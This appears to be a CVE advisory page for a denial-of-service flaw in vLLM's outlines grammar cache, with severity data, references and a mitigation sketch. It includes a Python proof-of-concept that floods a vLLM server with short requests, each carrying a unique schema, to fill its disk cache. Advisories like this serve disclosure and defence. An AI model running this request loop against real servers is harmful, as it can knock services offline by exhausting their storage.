CVE-2025-29770 - vLLM Outlines Cache Denial of Service Vulnerability
Severity: 6.5 MEDIUM (CVSS 3.1)
Description
Description

vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in 0.8.0.
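
To make the request pattern above concrete, here is a minimal sketch written against vLLM's OpenAI-compatible API. The base URL, API key, and model name are placeholders; guided_decoding_backend comes straight from the description, and guided_json is the companion extra_body field vLLM's OpenAI-compatible server accepts for JSON-schema guided output. On affected versions (V0 engine, before 0.8.0), each distinct schema compiles a new outlines grammar and adds a new entry to the on-disk cache.

from openai import OpenAI

# Sketch of the request stream described above. The server URL, API key,
# and model name are placeholders for illustration.
client = OpenAI(base_url="http://localhost:8000/v1", api_key="EMPTY")

def unique_schema(i: int) -> dict:
    # Varying a property name makes each schema distinct, so no request
    # ever hits an existing cache entry.
    return {
        "type": "object",
        "properties": {f"field_{i}": {"type": "string"}},
        "required": [f"field_{i}"],
    }

for i in range(3):  # an attacker would loop indefinitely
    client.chat.completions.create(
        model="my-model",  # placeholder model name
        messages=[{"role": "user", "content": "hi"}],
        max_tokens=1,  # the "very short decoding requests" from the description
        extra_body={
            # Selects outlines on a per-request basis, as noted above,
            # even if the server is configured with a different default.
            "guided_decoding_backend": "outlines",
            # A new schema per request means a new compiled grammar
            # written to the on-disk cache (on affected versions).
            "guided_json": unique_schema(i),
        },
    )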

INFO

Published Date: March 19, 2025, 4:15 p.m.
Last Modified: July 31, 2025, 3:58 p.m.
Remotely Exploitable: Yes
Impact Score: 3.6
Exploitability Score: 2.8
Affected Products

The following products are affected by the CVE-2025-29770 vulnerability. The affected version range, per the CPE configuration and the description, is shown below.

ID   Vendor   Product   Affected Versions
1    vllm     vllm      versions before 0.8.0
References to Advisories, Solutions, and Tools

Here, you will find a curated list of external links that provide in-depth information, practical solutions, and valuable tools related to CVE-2025-29770.

https://github.com/vllm-project/vllm/blob/53be4a863486d02bd96a59c674bbec23eec508f6/vllm/model_executor/guided_decoding/outlines_logits_processors.py (Product)
https://github.com/vllm-project/vllm/pull/14837 (Issue Tracking, Patch)
https://github.com/vllm-project/vllm/security/advisories/GHSA-mgrm-fgjv-mhv8 (Vendor Advisory, Patch)


The following timeline lists the changes that have been made to the CVE-2025-29770 vulnerability over time.

Vulnerability history details can be useful for understanding the evolution of a vulnerability, and for identifying the most recent changes that may impact the vulnerability's severity, exploitability, or other characteristics.

  • Initial Analysis by [email protected] (Jul. 31, 2025)

    Added CPE Configuration: OR *cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* versions up to (excluding) 0.8.0
    Added Reference Type: GitHub, Inc.: https://github.com/vllm-project/vllm/blob/53be4a863486d02bd96a59c674bbec23eec508f6/vllm/model_executor/guided_decoding/outlines_logits_processors.py Types: Product
    Added Reference Type: GitHub, Inc.: https://github.com/vllm-project/vllm/pull/14837 Types: Issue Tracking, Patch
    Added Reference Type: GitHub, Inc.: https://github.com/vllm-project/vllm/security/advisories/GHSA-mgrm-fgjv-mhv8 Types: Patch, Vendor Advisory
  • New CVE Received by [email protected] (Mar. 19, 2025)

    Added Description: (the full vulnerability description quoted above)
    Added CVSS V3.1: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
    Added CWE: CWE-770
    Added Reference: https://github.com/vllm-project/vllm/blob/53be4a863486d02bd96a59c674bbec23eec508f6/vllm/model_executor/guided_decoding/outlines_logits_processors.py
    Added Reference: https://github.com/vllm-project/vllm/pull/14837
    Added Reference: https://github.com/vllm-project/vllm/security/advisories/GHSA-mgrm-fgjv-mhv8

EPSS - Exploit Prediction Scoring System

EPSS is a daily estimate of the probability of exploitation activity being observed over the next 30 days.
CWE - Common Weakness Enumeration

While CVE identifies specific instances of vulnerabilities, CWE categorizes the common flaws or weaknesses that can lead to vulnerabilities. CVE-2025-29770 is associated with the following CWE:

CWE-770: Allocation of Resources Without Limits or Throttling
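
The upstream fix landed in vLLM 0.8.0 via the pull request referenced above. Independent of that patch, the generic remedy for CWE-770 is to bound the allocation. The sketch below is a hypothetical illustration that caps an on-disk cache directory by evicting least-recently-accessed files; the function name, directory path, and byte budget are assumptions for illustration, not vLLM or outlines configuration.

import os

def enforce_cache_budget(cache_dir: str, max_bytes: int) -> None:
    # Hypothetical CWE-770 mitigation: evict least-recently-accessed
    # files until the directory fits within the given byte budget.
    entries = []
    total = 0
    for name in os.listdir(cache_dir):
        path = os.path.join(cache_dir, name)
        if os.path.isfile(path):
            st = os.stat(path)
            entries.append((st.st_atime, st.st_size, path))
            total += st.st_size
    # Oldest access time first; stop as soon as we are under budget.
    for _, size, path in sorted(entries):
        if total <= max_bytes:
            break
        os.remove(path)
        total -= size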

CVSS 3.1 - Common Vulnerability Scoring System

Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: None
Availability: High
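
For reference, the values above follow mechanically from the CVSS 3.1 vector recorded in the change history. A minimal sketch of that expansion, covering only the levels defined for these base metrics:

# Expand the CVSS 3.1 base vector recorded in the change history into
# the human-readable metric values shown above.
VECTOR = "AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"

METRICS = {
    "AV": ("Attack Vector", {"N": "Network", "A": "Adjacent", "L": "Local", "P": "Physical"}),
    "AC": ("Attack Complexity", {"L": "Low", "H": "High"}),
    "PR": ("Privileges Required", {"N": "None", "L": "Low", "H": "High"}),
    "UI": ("User Interaction", {"N": "None", "R": "Required"}),
    "S": ("Scope", {"U": "Unchanged", "C": "Changed"}),
    "C": ("Confidentiality", {"N": "None", "L": "Low", "H": "High"}),
    "I": ("Integrity", {"N": "None", "L": "Low", "H": "High"}),
    "A": ("Availability", {"N": "None", "L": "Low", "H": "High"}),
}

for part in VECTOR.split("/"):
    key, value = part.split(":")
    name, levels = METRICS[key]
    print(f"{name}: {levels[value]}")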